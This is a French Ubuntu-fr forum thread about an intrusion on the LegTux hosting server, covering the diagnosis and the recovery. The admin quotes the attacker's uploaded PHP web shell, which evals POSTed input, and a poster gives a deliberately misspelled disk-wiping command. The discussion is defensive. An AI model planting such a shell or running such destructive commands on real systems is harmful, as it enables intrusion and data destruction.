Votre avis sur LegTux svp

pef · Le 05/09/2010, à 14:40

LegSim a écrit :

En effet, c'est reparti pour un tour...
C'est tout de même étrange... Est-ce que c'est possible de détruire une partition et toute la table de partitions alors que le système tourne et qu'aucun accès SSH n'est possible ?

-As-tu réinstallé un OS depuis une source fiable ? (support d'installation officiel)
-As-tu restauré des mots de passe identiques à n'importe quel niveau ? (bdd, système, mail, ...)
-As-tu restauré des données exécutables ? (scripts shell, php, ...)

Si oui, l'intru a sûrement mis une porte dérobée facilement réactivable une fois le système restauréet là, à part restaurer des données datant d'avant l'intrusion, tu te ballade avec ses failles en gré de tes restaurations.

ubuntlin · Le 05/09/2010, à 15:12

Je vois qu'on a pas encore fini avec ces problèmes
Je vois qu'il y a eu un soucis au niveau des partitions, c'est pas si banale que ça
Mais je suis sûr que tout va se remettre à la normal

LegSim · Le 05/09/2010, à 19:36

J'avais restauré tous les binaires depuis une Debian propre.
Les mots de passe avaient TOUS été changés.

La table de partitions était détruite. C'est faisable depuis un système monté ça O_o ?

J'ai réussi à refaire venir les données. Évidemment, plus de logs. Plus de données utilisateur non plus (mais j'ai un backup de juste avant le crash).

Un seul truc qui avait changé : un .tar.gz des sources qui était créé dans le /var/www/legtux.org, il n'y était pas avant.

Le mec est un type connaisseur, je pense...

xapantu · Le 05/09/2010, à 19:39

LegSim a écrit :

Un seul truc qui avait changé : un .tar.gz des sources qui était créé dans le /var/www/legtux.org, il n'y était pas avant.

Le tar.gz est apparu après ce piratage ? Faudrait faire un diff avec la version actuel, à tous hasards...

LegSim · Le 05/09/2010, à 19:56

Après oui, aucune différence avec l'actuel.

xapantu · Le 05/09/2010, à 19:59

LegSim a écrit :

Après oui, aucune différence avec l'actuel.

Oo ? Bizarre...

samυncle · Le 05/09/2010, à 20:17

Je viens de lire c'est dommage ce qui t'es arrivé . En tout cas si je peux te donner un conseil, laisse les sources ouvertes (c'est plus sécurisé) et si une personne trouve une faille elle pourra te le dire (oui il y a des gens honnete qui quand ils trouvent une faille ils préviennent)

LegSim · Le 05/09/2010, à 20:51

Serveur réparé.
On m'a parlé d'une faille dans le open_basedir de PHP qui permettait de passer outre cette directive. Mais comme le full disclosure est interdit, il ne pouvait pas me donner un exemple de code l'exploitant.
Donc, si cette faille existe vraiment, on peut créer un fichier qui peut-être exécuté par le site LegTux, donc avec la commande exec et sudo pour les droits root. Il faut donc que je limite les commandes que peut exécuter le site, pour éviter ce genre de trucs.

J'ai rétabli les services mails et Jabber. Je vais essayer de n'autoriser que les commandes qui sont strictement utiles au bon fonctionnement du serveur par sudo.

Mais personne n'a répondu à ma question : c'est possible de détruire une partition et la table de partoche depuis le système monté ?

compte supprimé · Le 05/09/2010, à 20:59

AMA, tu peux facilement flinguer le MBR ou une partition avec la commande dd, même depuis un système monté.

rmy · Le 05/09/2010, à 23:48

je confirme. J'essaierai un peu plus tard, mais je ne vois pas ce qui poserait problème...

pef · Le 05/09/2010, à 23:58

LegSim a écrit :

Serveur réparé.
On m'a parlé d'une faille dans le open_basedir de PHP qui permettait de passer outre cette directive. Mais comme le full disclosure est interdit, il ne pouvait pas me donner un exemple de code l'exploitant.
Donc, si cette faille existe vraiment, on peut créer un fichier qui peut-être exécuté par le site LegTux, donc avec la commande exec et sudo pour les droits root. Il faut donc que je limite les commandes que peut exécuter le site, pour éviter ce genre de trucs.
J'ai rétabli les services mails et Jabber. Je vais essayer de n'autoriser que les commandes qui sont strictement utiles au bon fonctionnement du serveur par sudo.
Mais personne n'a répondu à ma question : c'est possible de détruire une partition et la table de partoche depuis le système monté ?

Je pense qu'il faut plus te pencher sur une faille de ton code plutôt que de php.

Et il est possible de détruire n'importe quoi en root (cat /dave/zero > /dev/hda, et voilà, plus rien)

kamui57 · Le 06/09/2010, à 00:00

Et il est possible de détruire n'importe quoi en root (cat /dave/zero > /dev/hda, et voilà, plus rien)

Dave serait content (ouais je sais la situation n'est pas drôle, mais j'adore la commande)

pef · Le 06/09/2010, à 00:06

kamui57 a écrit :

Et il est possible de détruire n'importe quoi en root (cat /dave/zero > /dev/hda, et voilà, plus rien)
Dave serait content (ouais je sais la situation n'est pas drôle, mais j'adore la commande)

pour éviter les copier/coller malencontreux

kamui57 · Le 06/09/2010, à 00:09

Ah ok, bonne idée J'essaierai d'y penser si un jour je dois écrire un truc du genre

LegSim · Le 06/09/2010, à 21:26

C'est en cours de sécurisation...
Je fais tout mon possible et je contacte des gens doués là-dedans.

Réouverture Mercredi je pense.

LegSim · Le 06/09/2010, à 22:56

Génial !

J'ai trouvé les traces de l'intrusion : ça venait du service upload, dans lequel le pirate a envoyé un fichier avec ses superbes commandes.
Ensuite il a contourné mes protections de l'include pour faire exécuter ça par le site normal. Fallait trouver, c'était une faille bien spécifique.

J'ai le fichier .php qu'il a créé pour faire ça !

Donc je réouvre tranquillement, si vous voyez des bugs, tell me !

Sir Na Kraïou · Le 06/09/2010, à 23:03

C'est cool ! T'as des logs ou un moyen quelconque de savoir qui a fait ça ?

Dernière modification par Р☢w ! ✰ :mad: ✰ (эй !) (Le 06/09/2010, à 23:03)

LegSim · Le 06/09/2010, à 23:04

Il a agit en deux temps :

Il a d'abord utilisé son compte pour faire un premier accès discret, dans lequel il a trifouillé les fichiers sessions pour se connecter en tant qu'un autre compte, duquel il a envoyé le fichier explosif.

helly · Le 06/09/2010, à 23:05

Hourra !

LegSim · Le 06/09/2010, à 23:14

Voici le script qui a été utilisé :

<form method="POST" action="?<?php echo $_SERVER["QUERY_STRING"]; ?>">
<textarea name="message"></textarea>
<input type="submit">
</form>
<?php
var_dump($_POST);
error_reporting(0);
echo eval(stripslashes($_POST['message']));
?>

tatsu-chan · Le 07/09/2010, à 10:11

LegSim a écrit :

Il a agit en deux temps :
Il a d'abord utilisé son compte pour faire un premier accès discret, dans lequel il a trifouillé les fichiers sessions pour se connecter en tant qu'un autre compte, duquel il a envoyé le fichier explosif.

Ça veut donc dire que tu sais qui a fait ça ?

LegSim · Le 07/09/2010, à 10:29

Non, le compte en question a été supprimé après avoir modifié les sessions pour se faire reconnaitre comme un autre compte.

rmy · Le 07/09/2010, à 10:58

tu n'a pas un log de créations/supressions de comptes ?

LegSim · Le 07/09/2010, à 11:02

Non, c'est vrai que ça manque.

tatsu-chan · Le 07/09/2010, à 11:28

Et tu n'as pas une liste des comptes créés avant le hack et une liste des comptes après le hack ? Ainsi, par déduction, on pourrait retrouver le pirate, ou à défaut des suspects.

Ubuntu-fr

Navigation

Liens de recherche

Annonce

#201 Le 05/09/2010, à 14:40

Re : Votre avis sur LegTux svp

#202 Le 05/09/2010, à 15:12

Re : Votre avis sur LegTux svp

#203 Le 05/09/2010, à 19:36

Re : Votre avis sur LegTux svp

#204 Le 05/09/2010, à 19:39

Re : Votre avis sur LegTux svp

#205 Le 05/09/2010, à 19:56

Re : Votre avis sur LegTux svp

#206 Le 05/09/2010, à 19:59

Re : Votre avis sur LegTux svp

#207 Le 05/09/2010, à 20:17

Re : Votre avis sur LegTux svp

#208 Le 05/09/2010, à 20:51

Re : Votre avis sur LegTux svp

#209 Le 05/09/2010, à 20:59

Re : Votre avis sur LegTux svp

#210 Le 05/09/2010, à 23:48

Re : Votre avis sur LegTux svp

#211 Le 05/09/2010, à 23:58

Re : Votre avis sur LegTux svp

#212 Le 06/09/2010, à 00:00

Re : Votre avis sur LegTux svp

#213 Le 06/09/2010, à 00:06

Re : Votre avis sur LegTux svp

#214 Le 06/09/2010, à 00:09

Re : Votre avis sur LegTux svp

#215 Le 06/09/2010, à 21:26

Re : Votre avis sur LegTux svp

#216 Le 06/09/2010, à 22:56

Re : Votre avis sur LegTux svp

#217 Le 06/09/2010, à 23:03

Re : Votre avis sur LegTux svp

#218 Le 06/09/2010, à 23:04

Re : Votre avis sur LegTux svp

#219 Le 06/09/2010, à 23:05

Re : Votre avis sur LegTux svp

#220 Le 06/09/2010, à 23:14

Re : Votre avis sur LegTux svp

#221 Le 07/09/2010, à 10:11

Re : Votre avis sur LegTux svp

#222 Le 07/09/2010, à 10:29

Re : Votre avis sur LegTux svp

#223 Le 07/09/2010, à 10:58

Re : Votre avis sur LegTux svp

#224 Le 07/09/2010, à 11:02

Re : Votre avis sur LegTux svp

#225 Le 07/09/2010, à 11:28

Re : Votre avis sur LegTux svp

Pied de page des forums